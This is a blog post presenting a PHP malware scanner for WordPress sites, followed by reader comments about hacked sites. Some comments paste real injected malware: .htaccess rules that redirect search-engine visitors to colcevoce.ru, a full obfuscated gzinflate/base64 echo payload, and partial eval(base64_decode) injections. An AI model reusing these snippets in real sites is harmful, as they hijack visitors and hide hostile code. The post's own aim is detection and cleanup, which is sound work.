WordPress Hack: Malware Scanner

This Malware Scanner script scans files and detects for a possible malware codes. This script will return a list of possible infected files. Each file will be labelled with (eval, c99madshell, & long_text) and a portion of the matched codes. The script will match a word “eval(…), <?php $md5=”…”; $wp_salt=”…”; … (also know as ‘c99madshell’), and a long_text such as “FEKS2121asFklMn83kUgdlf/sDkn12L+…”, because I believe these are potential malware code.

When you’re done running the malware scanner script, double check the result. Do not delete or clean them immediately. The script matches also clean files as long as it has the 3 potential hacker codes. So, please be careful.

Below are the sample results:

1. ./website.com/wp-includes/js/tw-sack.dev.js – eval – eval(this.response

  • File  - ./website.com/wp-includes/js/tw-sack.dev.js
  • Label – eval
  • Small portion of Matched Code – eval(this.response
  • Not a hacker code

2. ./website2.com/system/libs/65d1.php – long_text – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr

  • File  -  ./website2.com/system/libs/65d1.php
  • Label – long_text
  • Small portion of Matched Code – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
  • I checked the file and confirmed it was a hacker’s code.

Download Malware Scanner
To use the script you can run it on your favorite browser or using a command line (recommended):

$ time php scanner_2.6.php 2>&1 >> scanner_log | tail -f scanner_log

This command will run the scanner_2.6.php and log the output on scanner_log file.

scanner_2.6
Title : scanner_2.6
Caption :
File name : scanner_2.6.zip
Size : 3 kB

This entry was posted in Wordpress. Bookmark the permalink.

52 Responses to WordPress Hack: Malware Scanner

  1. Anthony says:

    Hi Paolo

    First up, thanks for your great work with this script.

    When I run it via command line or browser, I get this:

    ../infected/
    ################################################################################

    Found Files
    Summary. You can take a better look on files that matches a potential hack script.

    Then in my error log I see:

    [28-Feb-2012 20:41:34] PHP Warning: opendir(../infected/) [function.opendir]: failed to open dir: No such file or directory in /*****/*****/public_html/barcodeinfo/scanner_2.3.php on line 83
    [28-Feb-2012 20:41:35] PHP Warning: Invalid argument supplied for foreach() in /***/*****/public_html/barcodeinfo/scanner_2.3.php on line 57

    Any ideas?

    thanks
    Anthony

    • Paolo says:

      Oh! Sorry about that Anthony, I have fixed it, I changed now the $root="./"; on line 25.

      Let me know your thoughts about the scanner. Thanks for using.

      Regards,
      Paolo

  2. Brian says:

    Paolo

    I have some malware issues going on but I’m not sure how to fix. I run the cleaner and it works but the malware returns again so I don’t think that I’m getting to the root of the issue. I ran the scanner but am not sure what I’m looking for. Can you please help or point me in the right direction?

    These are always the infected files found by the cleaner
    ./index.php
    ./wp-admin/index.php
    ./wp-content/index.php

    http://ericpostonline.com/scanner_2.3.php

    • Paolo says:

      Hi Brian,

      We need to find the script that creates the malware code.
      The scan result can help me find it.

      I’ll run the scanner on your site and check the result.

      Let you know.

      Paolo

  3. Die2mrw007 says:

    Great work Paolo….This is really useful plugin :)
    The best one indeed.

  4. Rulex says:

    The scanner code is not working for me, it says that the server is busy after it stays there for a while like it is doing something but is says server busy after a while.

    Total newb here, pls be patient :)

    And thank you very much for this!

    • Paolo says:

      Hello Rulex,

      Thanks for using my code. Can you check if there’s scanner_log on your directory where the scanner_2.4.php is located.
      Actually, the scanner should output directories or files as it scans your server.
      If it doesn’t show try this command :

      $ time php scanner_2.4.php 2>&1 >> scanner_log | tail -f scanner_log

      Also, when it’s done can you send the scanner_log to info@php-beginners.com because as of now I am the only who can
      understand the scanner_log but am still working on upgrading it.

      Let me know. Thanks.

      Paolo

  5. teresa says:

    Hi Paolo,

    I ran the script on my site and is having the same issue as the guy above. I don’t know what I am looking for and not sure if the malware is cleaned because the malware is still on the site. Here is the site

    http://thelauryndoll.com/scanner_2.4.php. I will email you as well. Thanks.

    • Paolo says:

      Hello Teresa,

      Thanks for using malware scanner. I’ll run it now and see what I found.
      Thanks. Keep you posted.

      Regards,
      Paolo :)

    • Paolo says:

      Hi Teresa,

      I just finished running the scanner, I found these suspicious 12 files:
      2. ./wp-signup.php
      -eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF

      76. ./wp-content/themes/headway/library/api/api-child-theme.php
      -eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF

      108. ./wp-content/themes/DailyNotes/page-gallery.php
      -timthumb vulnerability – timthumb

      109. ./wp-content/themes/DailyNotes/changelog.txt
      -timthumb vulnerability – timthumb
      -timthumb vulnerability – Timthumb

      110. ./wp-content/themes/DailyNotes/page-template-portfolio.php
      -timthumb vulnerability – timthumb

      111. ./wp-content/themes/DailyNotes/single.php
      -timthumb vulnerability – timthumb

      112. ./wp-content/themes/DailyNotes/page-blog.php
      -timthumb vulnerability – timthumb

      115. ./wp-content/themes/DailyNotes/epanel/custom_functions.php
      -timthumb vulnerability – timthumb

      120. ./wp-content/themes/DailyNotes/includes/entry.php
      -timthumb vulnerability – timthumb

      121. ./wp-content/themes/DailyNotes/includes/entry2.php
      -timthumb vulnerability – timthumb

      122. ./wp-content/themes/DailyNotes/includes/functions/troubleshooting.php
      -timthumb vulnerability – timthumb
      -timthumb vulnerability – Timthumb

      123. ./wp-content/themes/DailyNotes/includes/functions/installation.php
      -timthumb vulnerability – TimThumb

      I really got the feeling that the main malware script is in ./wp-signup.php
      Please send the files to me at info@php-beginners.com

      Let me know. Thanks.

      Paolo :)

  6. Cesar says:

    Hi Paolo, can I use the script to scan an Joomla website?
    Thank you.
    Cesar

    • Paolo says:

      Yes Cesar, you can use it on Joomla, just send me the scan result if you don’t know how to read it.

      Thanks for using it.

      Paolo :)

  7. wayne says:

    I don’t know anything about php and would like to use this scanner. I know basic WP installs but that is it. My sites have been hit with a JS Redirect trojan. My host company found malware on a few sites and cleaned those. I’m blocked by my antivirus from visiting a couple other sites still. Do you have steps for a complete newb on how to use your scanner?

    Thanks,
    Wayne

    • Paolo says:

      Hi Wayne,

      I’ll create one for you Wayne don’t worry.
      What hosting are you using? What’s your website URL?
      Can you access your server using “Shell Access” if
      don’t have any please ask your hosting support about
      “Shell Access”.

      Keepy you posted.

      Thanks.
      Paolo :)

  8. Pingback: WordPress Hack : Malware Scanner | Komputer, Internet, Software Tips

  9. Sandman77 says:

    Thanks for the script but I get timeouts :( I am on Dreamhost.com but live in Germany…

    http://www.nowayland.com/cleaner28.php
    http://www.nowayland.com/scanner26.php

    I have 5 WordPress sites on there and one directs ONLY in Safari oddly… Can you help? I have reinstalled wordpress but not removed old themes or old plugins but updated most…

  10. Enric says:

    Hi Paolo, thanks for the great work.
    It’s possible to run the script in a drupal installation?
    Let me explain my scenario :) , I’m been infected by and old installation of Joomla (almost sure) that I’m not using anymore. But, they infected all my server drupal installations changing the .htaccess files with the code on the end of my message.
    I ran your cleaner but about 30 min after the .htaccess it has been modified again.
    Any ideas??? I’m run of it.
    Any help It will be appreciated.
    p.d. Sorry for my english.
    Best regards!!

    RewriteEngine On

    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|

    altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|

    metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|

    aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|

    metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|

    webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|

    lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|

    brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|

    cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|

    sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

    RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|

    arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|

    telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|

    klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|

    click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|

    kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|

    friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|

    express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|

    startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|

    allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|

    westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]

    • Paolo says:

      Hello Enric,

      You need to find the file that is responsible on writing again
      the malware script on your server.

      You can do it by running a malware scanner, you can download it here:
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download

      and send the scan result to me @ info@php-beginners.com.

      Paolo

      • Enric says:

        Ok, thanks Paolo,
        I’ll leave running the script all night. :) . There’s a lot of drupal installation, but fortunately the problem it’s the same.
        I had tried to search manually the f… file, but with no results :(
        Thanks in adavance!!

        Enric

        • Sandra says:

          I had a blog where the hackers injetced black hat links in my content. The liks could only be seen in the code and not on the visual part of the blog. I found out it was hacked when I looked up the most used keywords in Google webmaster tools. I knew I never used keywords like viagra and other pharmacy products, still it was according got GWT the most used keywords onm my site. I did not use the timthumb.php. Script, and I am not quite sure where the hackers got in. It my be the files on the server had write access and the server was shared. Bjorn recently posted..

      • Enric says:

        Hi Paolo!!,
        the script still working. A lot of directories :)
        Tomorrow I’ll send to you.
        Thanks

  11. angela says:

    Hi, Paolo,

    Thanks for the scripts. My site have been struggling by the hackers for months, and i have no idea how to solve it instead of keep asking the host Q&A to restore…I guess ur work can help me to get rid of it completely…but the problem is the scanning is running very slow on my computer that no result showed. Also, i believe even the result can show, i cant able to read it. Sincerely ask you to help me~~Thank you…

  12. Kenneth says:

    I think my sites (22 joomla installations on one server). I have run your cleaner and scanner. But I have problem finding the source of my problem.

    • Paolo says:

      Hello Kenneth,

      Just send the scan logs to me. Maybe that way we can find the mail malware script.

      Let me know

  13. Pinky says:

    Paolo,
    I sent you an email at info@php-beginners.com.
    I’m unable to run the scanner_2.6.php script from any browser. The email contains info that may help.

    I hope this was ok…. just desperate to fix this problem!
    Regards,
    Pinky

  14. John says:

    Hi Paolo, I’ve sent you an email with a scanner log. If you could help Id really appreciate as this has been driving me mad for weeks.

    Best,

    John

  15. Vibha says:

    Thank you Paolo!
    I have replaced all garbage code from your help and changed FTP details.
    After 3-4 days again this code came back, What should i do?

    • Paolo says:

      Hi Vibha,

      Can you please try to scan your site. Download my malware scanner here:
      http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download

      Run and send the scan result to me at info@php-beginners.com

      Let me know. Paolo

      • Vibha says:

        Thanks for reply.

        I found these code in all index files.
        * ./wp-content/themes/twentyeleven/index.php
        -eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU
        * ./index.php
        -eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU

        And found one cgi_bin folder under root which have yhqti.php file with garbage coding.

        There is also one log file generated on root because of virus, which have all visited user’s ip addresses.

        • Paolo says:

          ah! I see. just continue the scan and send the result to me.
          We need to find the file that is responding of rewriting the malware codes again.

  16. Viptor says:

    Hello Paolo my site appear to have in the main header the eval64 codes and i deleted all the codes and it appeared again! I have sent the results to your email please review the codes..

  17. tofe says:

    Hey,
    tbaks for the scanner, but can’t you explain how to use your scanner for people who don’t know about command lines and shell whatever? Is that so difficult? What do i have to do? Upload the file and start it somehow?! How? Thank you.

  18. Abrek says:

    Hello Paolo, thanks for your program. I am having the malware problem in my wp header.php file. i cleaned it 100 times but it keeps coming back. I made a scan with your code but the result is too long and complicated. and it says 140 possible malware codes found. is there any way that you can help me?
    Thanks

  19. Abrek says:

    I sent the mail just now. Thank you very much! :)

  20. I am now stumped I had 3 sites hacked. I think I have 2 fixed but one the code in the header.php keeps coming back. I an not that good with code. the code that keeps coming back is

    #c3284d#
    echo(gzinflate(base64_decode(“JY5NDsIgEIX3Jr0DmU11U6ILFwp4CS9AKcIohYYOVm8vtbuXL+9PzCbjRIy+k5VA9kP8qd96o6Ca3ZBMGW2kbslIdt8KfGQ9WjZnI8ETTRfO+6DNC8vY5cIxdsbh7XgGFqtPwn1BIpuB1c4UAkYnQRdKwP5FfcqDzRJiBTqgixJMnVsD3qLzJOEEbMGB/KqU4NsB1R6uzU7w7an6AQ==”)));
    #/c3284d#

    I have all three programs on the site
    http://www.tenofthebest.net/scanner_2.6.php
    http://www.tenofthebest.net/cleaner-cli_2.10.php
    http://www.tenofthebest.net/cleaner_2.10.php
    the cleaner says no infected but that line keeps coming back. I also have tried the scanner but not sure what I am looking for. Everything I look at seems to belong but I am not a coder.

    I really would appreciate if you could give me a tip on how to find the problem with the scanner because I am sure it will happen again and I will need to try and figure out how to fix on another site.

    Thanks,
    Jeff

  21. taimoor says:

    Hello Paolo,

    i have uploaded ur malware scanning script on my server, my site works fine on direct access but if i access it through search engine it redirects to a iframed page, although i had my hosting company scan it but they failed to fix it and messed up my website’s layout :(
    this is the site: http://reviewjuicers.com/scanner_2.6.php where i have added the script

  22. Jeff says:

    Hello Paolo,

    First of all, thank you for helping out so many people. I hesitate to ask for your assistance when I see how much you have already done. I’ve read through the posts above and I have a question about whether I’ve used your scripts correctly.

    My site is causing malware warnings for some of its users. I am concerned that if I don’t fix it soon that Google will blacklist it. We are a community-based photography festival in Chicago and have just launched our yearly program this week. I’m in trouble!

    I ran the scanner at http://www.filterfestival.com/scanner_2.6.php and it reported 189 suspect files. I then ran the cleaner at http://www.filterfestival.com/cleaner_2.10.php and it reported 0 infected files.

    Does this mean that your script was successful?

    Thank you again for your help.

    Jeff

  23. Chris says:

    Hi Paolo,

    First off, thanks for creating this. I have uploaded scanner_2.6.php to the root folder of my website and I get the following error when trying to run it:

    Error 355 (net::ERR_INCOMPLETE_CHUNKED_ENCODING): The server unexpectedly closed the connection.

    Can you run the scan for me or give me some pointers? Thanks in advance!

    http://www.texaselectricbroker.com/scanner_2.6.php

    Best regards,
    Chris

  24. Fernando says:

    Hello Paolo, great work with the script! I sent you an email with the log file I got from the scan… let me know if you’re available to help!
    Thanks
    Fernando

  25. Cosy says:

    Hi Paolo

    I have request few and need your help?

    Cosy

  26. Pingback: Automated Fix for Wordpress base64_decode Injection in PHP Files • Raymond.CC

  27. Krys says:

    I have uploaded cleaner file into my directory using cpanel on godaddy/wordpress. I am not sure if uploading the file is all that I need to do. Or how do I run it? I am php newbie. Can you please help me. I need to fix 20 hacked sites on godaddy

Leave a Reply

Your email address will not be published. Required fields are marked *


*

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>